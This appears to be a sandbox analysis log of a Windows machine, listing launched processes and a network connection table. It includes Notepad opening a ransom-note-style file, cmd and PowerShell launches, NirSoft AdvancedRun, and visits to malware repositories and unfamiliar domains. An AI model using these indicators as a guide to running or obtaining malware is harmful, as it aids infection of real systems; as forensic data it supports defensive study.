"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\GET_YOUR_FILES_BACK.txt
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=41 --mojo-platform-channel-handle=3248 --field-trial-handle=1992,i,7781823854322016087,8713180211781351647,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=42 --mojo-platform-channel-handle=3984 --field-trial-handle=1992,i,7781823854322016087,8713180211781351647,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=43 --mojo-platform-channel-handle=4968 --field-trial-handle=1992,i,7781823854322016087,8713180211781351647,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=44 --mojo-platform-channel-handle=5668 --field-trial-handle=1992,i,7781823854322016087,8713180211781351647,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=45 --mojo-platform-channel-handle=5048 --field-trial-handle=1992,i,7781823854322016087,8713180211781351647,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=4696 --field-trial-handle=1992,i,7781823854322016087,8713180211781351647,131072 /prefetch:8
C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x4f0 0x4c4
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6280 --field-trial-handle=1992,i,7781823854322016087,8713180211781351647,131072 /prefetch:8
C:\Program Files\7-Zip\7zG.exe
"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\advancedrun-x64\" -spe -an -ai#7zMap21697:92:7zEvent13707
C:\Users\Admin\Downloads\advancedrun-x64\AdvancedRun.exe
"C:\Users\Admin\Downloads\advancedrun-x64\AdvancedRun.exe"
C:\Windows\system32\cmd.exe
"cmd.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --default-search-provider=? --out-pipe-name=MSEdgeDefault037237eah27e8h403chbb49haa253b5c0bb1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ff996c046f8,0x7ff996c04708,0x7ff996c04718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2064,3363053809461646320,3408107611197097556,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2092 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2064,3363053809461646320,3408107611197097556,131072 --lang=de --service-sandbox-type=none --mojo-platform-channel-handle=2216 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2064,3363053809461646320,3408107611197097556,131072 --lang=de --service-sandbox-type=utility --mojo-platform-channel-handle=2896 /prefetch:8
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -s LxpSvc
C:\Windows\system32\cmd.exe
"cmd.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=48 --mojo-platform-channel-handle=5824 --field-trial-handle=1992,i,7781823854322016087,8713180211781351647,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6228 --field-trial-handle=1992,i,7781823854322016087,8713180211781351647,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=50 --mojo-platform-channel-handle=1672 --field-trial-handle=1992,i,7781823854322016087,8713180211781351647,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6516 --field-trial-handle=1992,i,7781823854322016087,8713180211781351647,131072 /prefetch:8
C:\Windows\explorer.exe
"C:\Windows\explorer.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6952 --field-trial-handle=1992,i,7781823854322016087,8713180211781351647,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=110.0.5481.104 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff99a76ab58,0x7ff99a76ab68,0x7ff99a76ab78
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1732 --field-trial-handle=2008,i,17517627795120512435,3391317024430562025,131072 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1964 --field-trial-handle=2008,i,17517627795120512435,3391317024430562025,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=2252 --field-trial-handle=2008,i,17517627795120512435,3391317024430562025,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3000 --field-trial-handle=2008,i,17517627795120512435,3391317024430562025,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3036 --field-trial-handle=2008,i,17517627795120512435,3391317024430562025,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=110.0.5481.104 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff99a76ab58,0x7ff99a76ab68,0x7ff99a76ab78
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1384 --field-trial-handle=1952,i,9704593771610671443,2998305469192196698,131072 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2000 --field-trial-handle=1952,i,9704593771610671443,2998305469192196698,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=2296 --field-trial-handle=1952,i,9704593771610671443,2998305469192196698,131072 /prefetch:8
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE
"C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE"
C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\DW\DW20.EXE
"C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\DW\DW20.EXE" -x -s 2792
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 13.107.21.237:443 | g.bing.com | tcp |
| NL | 23.62.61.72:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 149.220.183.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 80.90.14.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 23.177.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 237.21.107.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 72.61.62.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 209.205.72.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.165.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 206.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.214.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 82.90.14.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.35.223.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | www.google.com | udp |
| GB | 142.250.187.196:443 | www.google.com | udp |
| GB | 142.250.187.196:443 | www.google.com | tcp |
| US | 8.8.8.8:53 | 106.201.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 195.187.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 196.187.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 195.212.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | play.google.com | udp |
| GB | 172.217.169.46:443 | play.google.com | udp |
| N/A | 224.0.0.251:5353 | | udp |
| US | 8.8.8.8:53 | clients2.google.com | udp |
| GB | 142.250.187.206:443 | clients2.google.com | udp |
| US | 8.8.8.8:53 | 46.169.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 206.187.250.142.in-addr.arpa | udp |
| GB | 142.250.187.206:443 | clients2.google.com | tcp |
| US | 8.8.8.8:53 | cxcs.microsoft.net | udp |
| US | 8.8.8.8:53 | 88.156.103.20.in-addr.arpa | udp |
| BE | 104.68.66.114:443 | cxcs.microsoft.net | tcp |
| NL | 23.62.61.194:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 194.61.62.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 114.66.68.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 99.201.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | consent.google.com | udp |
| GB | 142.250.187.238:443 | consent.google.com | tcp |
| US | 8.8.8.8:53 | content-autofill.googleapis.com | udp |
| US | 8.8.8.8:53 | 238.187.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | bonzi.link | udp |
| FR | 151.106.4.82:443 | bonzi.link | tcp |
| FR | 151.106.4.82:443 | bonzi.link | tcp |
| FR | 151.106.4.82:443 | bonzi.link | udp |
| US | 8.8.8.8:53 | googleads.g.doubleclick.net | udp |
| US | 8.8.8.8:53 | d36ee2fcip1434.cloudfront.net | udp |
| GB | 216.58.204.66:443 | googleads.g.doubleclick.net | tcp |
| US | 8.8.8.8:53 | 82.4.106.151.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 226.187.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | fundingchoicesmessages.google.com | udp |
| GB | 142.250.187.238:443 | fundingchoicesmessages.google.com | udp |
| GB | 142.250.187.238:443 | fundingchoicesmessages.google.com | udp |
| US | 8.8.8.8:53 | 66.204.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 74.204.58.216.in-addr.arpa | udp |
| GB | 216.58.204.66:443 | googleads.g.doubleclick.net | tcp |
| GB | 216.58.204.66:443 | googleads.g.doubleclick.net | tcp |
| GB | 216.58.204.66:443 | googleads.g.doubleclick.net | tcp |
| GB | 216.58.204.66:443 | googleads.g.doubleclick.net | tcp |
| GB | 216.58.204.66:443 | googleads.g.doubleclick.net | tcp |
| GB | 216.58.204.66:443 | googleads.g.doubleclick.net | tcp |
| US | 8.8.8.8:53 | tpc.googlesyndication.com | udp |
| GB | 172.217.16.225:443 | tpc.googlesyndication.com | tcp |
| GB | 172.217.16.225:443 | tpc.googlesyndication.com | udp |
| GB | 216.58.204.66:443 | googleads.g.doubleclick.net | udp |
| US | 8.8.8.8:53 | 225.16.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | ajax.googleapis.com | udp |
| US | 8.8.8.8:53 | s0.2mdn.net | udp |
| GB | 216.58.204.70:443 | s0.2mdn.net | tcp |
| GB | 216.58.204.70:443 | s0.2mdn.net | tcp |
| GB | 216.58.204.70:443 | s0.2mdn.net | tcp |
| FR | 151.106.4.82:80 | bonzi.link | tcp |
| FR | 151.106.4.82:80 | bonzi.link | tcp |
| GB | 216.58.204.70:443 | s0.2mdn.net | udp |
| US | 8.8.8.8:53 | securepubads.g.doubleclick.net | udp |
| GB | 142.250.200.34:443 | securepubads.g.doubleclick.net | tcp |
| US | 8.8.8.8:53 | 70.204.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 34.200.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | csi.gstatic.com | udp |
| US | 172.217.15.227:443 | csi.gstatic.com | tcp |
| US | 8.8.8.8:53 | 227.15.217.172.in-addr.arpa | udp |
| FR | 151.106.4.82:80 | bonzi.link | tcp |
| FR | 151.106.4.82:80 | bonzi.link | tcp |
| FR | 151.106.4.82:80 | bonzi.link | tcp |
| US | 172.217.15.227:443 | csi.gstatic.com | udp |
| US | 8.8.8.8:53 | apis.google.com | udp |
| GB | 172.217.16.238:443 | apis.google.com | udp |
| US | 8.8.8.8:53 | id.google.com | udp |
| GB | 142.250.200.35:443 | id.google.com | tcp |
| US | 8.8.8.8:53 | 35.200.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | www.google.com | udp |
| GB | 142.250.200.35:443 | id.google.com | udp |
| US | 8.8.8.8:53 | bazaar.abuse.ch | udp |
| US | 151.101.130.49:443 | bazaar.abuse.ch | tcp |
| US | 151.101.130.49:443 | bazaar.abuse.ch | tcp |
| US | 8.8.8.8:53 | 49.130.101.151.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 104.201.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | beacons.gcp.gvt2.com | udp |
| FR | 216.58.215.35:443 | beacons.gcp.gvt2.com | tcp |
| US | 8.8.8.8:53 | 35.215.58.216.in-addr.arpa | udp |
| FR | 216.58.215.35:443 | beacons.gcp.gvt2.com | udp |
| US | 8.8.8.8:53 | e2c24.gcp.gvt2.com | udp |
| US | 35.185.21.228:443 | e2c24.gcp.gvt2.com | tcp |
| US | 8.8.8.8:53 | 228.21.185.35.in-addr.arpa | udp |
| US | 8.8.8.8:53 | beacons.gvt2.com | udp |
| GB | 172.217.169.3:443 | beacons.gvt2.com | tcp |
| US | 8.8.8.8:53 | beacons5.gvt3.com | udp |
| FR | 172.217.18.195:443 | beacons5.gvt3.com | tcp |
| US | 8.8.8.8:53 | 3.169.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 195.18.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | google.com | udp |
| GB | 142.250.187.196:443 | www.google.com | udp |
| GB | 142.250.178.14:443 | google.com | tcp |
| US | 8.8.8.8:53 | 14.178.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | e2c74.gcp.gvt2.com | udp |
| FR | 34.1.15.89:443 | e2c74.gcp.gvt2.com | tcp |
| US | 8.8.8.8:53 | 89.15.1.34.in-addr.arpa | udp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | beacons2.gvt2.com | udp |
| US | 216.239.36.117:443 | beacons2.gvt2.com | tcp |
| US | 216.239.36.117:443 | beacons2.gvt2.com | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 117.36.239.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | github.githubassets.com | udp |
| US | 8.8.8.8:53 | avatars.githubusercontent.com | udp |
| US | 185.199.108.154:443 | github.githubassets.com | tcp |
| US | 185.199.108.154:443 | github.githubassets.com | tcp |
| US | 185.199.108.154:443 | github.githubassets.com | tcp |
| US | 185.199.108.154:443 | github.githubassets.com | tcp |
| US | 185.199.108.154:443 | github.githubassets.com | tcp |
| US | 185.199.108.154:443 | github.githubassets.com | tcp |
| US | 8.8.8.8:53 | github-cloud.s3.amazonaws.com | udp |
| US | 185.199.108.133:443 | avatars.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | user-images.githubusercontent.com | udp |
| US | 8.8.8.8:53 | repository-images.githubusercontent.com | udp |
| US | 185.199.109.133:443 | repository-images.githubusercontent.com | tcp |
| US | 185.199.109.133:443 | repository-images.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 154.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.109.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | collector.github.com | udp |
| US | 185.199.108.154:443 | github.githubassets.com | tcp |
| US | 8.8.8.8:53 | api.github.com | udp |
| US | 140.82.113.21:443 | collector.github.com | tcp |
| GB | 20.26.156.210:443 | api.github.com | tcp |
| US | 8.8.8.8:53 | 210.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 21.113.82.140.in-addr.arpa | udp |
| US | 8.8.8.8:53 | camo.githubusercontent.com | udp |
| FR | 216.58.215.35:443 | beacons.gcp.gvt2.com | udp |
| US | 8.8.8.8:53 | raw.githubusercontent.com | udp |
| US | 185.199.110.133:443 | raw.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 133.110.199.185.in-addr.arpa | udp |
| FR | 216.58.215.35:443 | beacons.gcp.gvt2.com | udp |
| US | 8.8.8.8:53 | e2c68.gcp.gvt2.com | udp |
| ZA | 34.35.20.64:443 | e2c68.gcp.gvt2.com | tcp |
| US | 8.8.8.8:53 | 64.20.35.34.in-addr.arpa | udp |
| GB | 172.217.169.3:443 | beacons.gvt2.com | udp |
| US | 8.8.8.8:53 | github-cloud.s3.amazonaws.com | udp |
| US | 8.8.8.8:53 | 90.65.42.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | erzurum.us | udp |
| US | 172.234.222.138:443 | erzurum.us | tcp |
| US | 172.234.222.138:443 | erzurum.us | tcp |
| US | 8.8.8.8:53 | vxvault.net | udp |
| IS | 82.221.129.39:443 | vxvault.net | tcp |
| IS | 82.221.129.39:443 | vxvault.net | tcp |
| GB | 216.58.212.195:80 | www.gstatic.com | tcp |
| FR | 216.58.215.35:443 | beacons.gcp.gvt2.com | udp |
| US | 8.8.8.8:53 | e2c56.gcp.gvt2.com | udp |
| ES | 34.0.206.140:443 | e2c56.gcp.gvt2.com | tcp |
| US | 8.8.8.8:53 | 39.129.221.82.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 140.206.0.34.in-addr.arpa | udp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| GB | 172.217.169.3:443 | beacons.gvt2.com | udp |
| US | 172.234.222.143:443 | erzurum.us | tcp |
| US | 172.234.222.143:443 | erzurum.us | tcp |
| GB | 142.250.187.206:443 | clients2.google.com | udp |
| GB | 142.250.187.206:443 | clients2.google.com | tcp |
| US | 172.234.222.138:443 | erzurum.us | tcp |
| US | 8.8.8.8:53 | github-cloud.s3.amazonaws.com | udp |
| US | 172.234.222.143:443 | erzurum.us | tcp |
| FR | 216.58.215.35:443 | beacons.gcp.gvt2.com | udp |
| US | 8.8.8.8:53 | api.github.com | udp |
| GB | 20.26.156.210:443 | api.github.com | tcp |
| US | 8.8.8.8:53 | www.google.com | udp |
| GB | 142.250.187.196:443 | www.google.com | udp |
| US | 8.8.8.8:53 | beacons.gcp.gvt2.com | udp |
| FR | 216.58.215.35:443 | beacons.gcp.gvt2.com | udp |
| US | 8.8.8.8:53 | play.google.com | udp |
| GB | 172.217.169.46:443 | play.google.com | udp |
| US | 8.8.8.8:53 | www.nirsoft.net | udp |
| US | 138.128.181.29:443 | www.nirsoft.net | tcp |
| US | 138.128.181.29:443 | www.nirsoft.net | tcp |
| US | 138.128.181.29:443 | www.nirsoft.net | tcp |
| US | 8.8.8.8:53 | s7.addthis.com | udp |
| US | 138.128.181.29:443 | www.nirsoft.net | tcp |
| US | 138.128.181.29:443 | www.nirsoft.net | tcp |
| US | 138.128.181.29:443 | www.nirsoft.net | tcp |
| NL | 23.216.252.74:443 | s7.addthis.com | tcp |
| US | 8.8.8.8:53 | region1.google-analytics.com | udp |
| US | 8.8.8.8:53 | googleads.g.doubleclick.net | udp |
| US | 216.239.34.36:443 | region1.google-analytics.com | tcp |
| GB | 172.217.169.66:443 | googleads.g.doubleclick.net | udp |
| US | 8.8.8.8:53 | fundingchoicesmessages.google.com | udp |
| GB | 142.250.187.238:443 | fundingchoicesmessages.google.com | udp |
| US | 8.8.8.8:53 | 29.181.128.138.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 2.180.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 74.252.216.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 66.169.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 36.34.239.216.in-addr.arpa | udp |
| GB | 142.250.187.238:443 | fundingchoicesmessages.google.com | udp |
| GB | 172.217.169.66:443 | googleads.g.doubleclick.net | udp |
| US | 8.8.8.8:53 | tpc.googlesyndication.com | udp |
| GB | 172.217.16.225:443 | tpc.googlesyndication.com | udp |
| US | 8.8.8.8:53 | 6.200.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | beacons2.gvt2.com | udp |
| US | 142.250.96.94:443 | beacons2.gvt2.com | udp |
| US | 8.8.8.8:53 | 94.96.250.142.in-addr.arpa | udp |
| US | 216.239.34.36:443 | region1.google-analytics.com | udp |
| US | 8.8.8.8:53 | csi.gstatic.com | udp |
| US | 216.239.32.3:443 | csi.gstatic.com | udp |
| US | 8.8.8.8:53 | redirector.gvt1.com | udp |
| GB | 142.250.187.206:443 | redirector.gvt1.com | tcp |
| US | 8.8.8.8:53 | 3.32.239.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | r4---sn-aigl6nsk.gvt1.com | udp |
| GB | 74.125.105.105:443 | r4---sn-aigl6nsk.gvt1.com | udp |
| US | 8.8.8.8:53 | 105.105.125.74.in-addr.arpa | udp |
| US | 138.128.181.29:443 | www.nirsoft.net | tcp |
| US | 8.8.8.8:53 | cxcs.microsoft.net | udp |
| BE | 104.68.66.114:443 | cxcs.microsoft.net | tcp |
| NL | 23.62.61.194:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 68.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 56.126.166.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | www.google.com | udp |
| GB | 142.250.187.196:443 | www.google.com | udp |
| US | 216.239.32.3:443 | csi.gstatic.com | udp |
| FR | 216.58.215.35:443 | beacons.gcp.gvt2.com | udp |
| US | 8.8.8.8:53 | google.com | udp |
| GB | 142.250.178.14:443 | google.com | udp |
| US | 216.239.34.36:443 | region1.google-analytics.com | udp |
| GB | 172.217.169.46:443 | play.google.com | udp |
| US | 8.8.8.8:53 | lens.google.com | udp |
| GB | 172.217.169.14:443 | lens.google.com | tcp |
| US | 8.8.8.8:53 | 14.169.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | beacons.gvt2.com | udp |
| GB | 172.217.169.3:443 | beacons.gvt2.com | udp |
| GB | 172.217.169.3:443 | beacons.gvt2.com | udp |
| US | 8.8.8.8:53 | beacons.gcp.gvt2.com | udp |
| GB | 142.250.178.14:443 | google.com | udp |
| GB | 172.217.169.67:443 | beacons.gcp.gvt2.com | udp |
| US | 8.8.8.8:53 | 67.169.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | www.google.com | udp |
| GB | 142.250.187.196:443 | www.google.com | udp |
| US | 8.8.8.8:53 | encrypted-tbn0.gstatic.com | udp |
| GB | 142.250.178.14:443 | encrypted-tbn0.gstatic.com | tcp |
| GB | 142.250.178.14:443 | encrypted-tbn0.gstatic.com | tcp |
| GB | 142.250.178.14:443 | encrypted-tbn0.gstatic.com | tcp |
| GB | 142.250.178.14:443 | encrypted-tbn0.gstatic.com | udp |
| US | 8.8.8.8:53 | encrypted-tbn1.gstatic.com | udp |
| US | 8.8.8.8:53 | encrypted-tbn2.gstatic.com | udp |
| GB | 142.250.180.14:443 | encrypted-tbn2.gstatic.com | tcp |
| GB | 142.250.180.14:443 | encrypted-tbn2.gstatic.com | udp |
| US | 8.8.8.8:53 | play.google.com | udp |
| GB | 172.217.169.46:443 | play.google.com | udp |
| US | 8.8.8.8:53 | ges-huellhorst.de | udp |
| DE | 81.169.145.88:443 | ges-huellhorst.de | tcp |
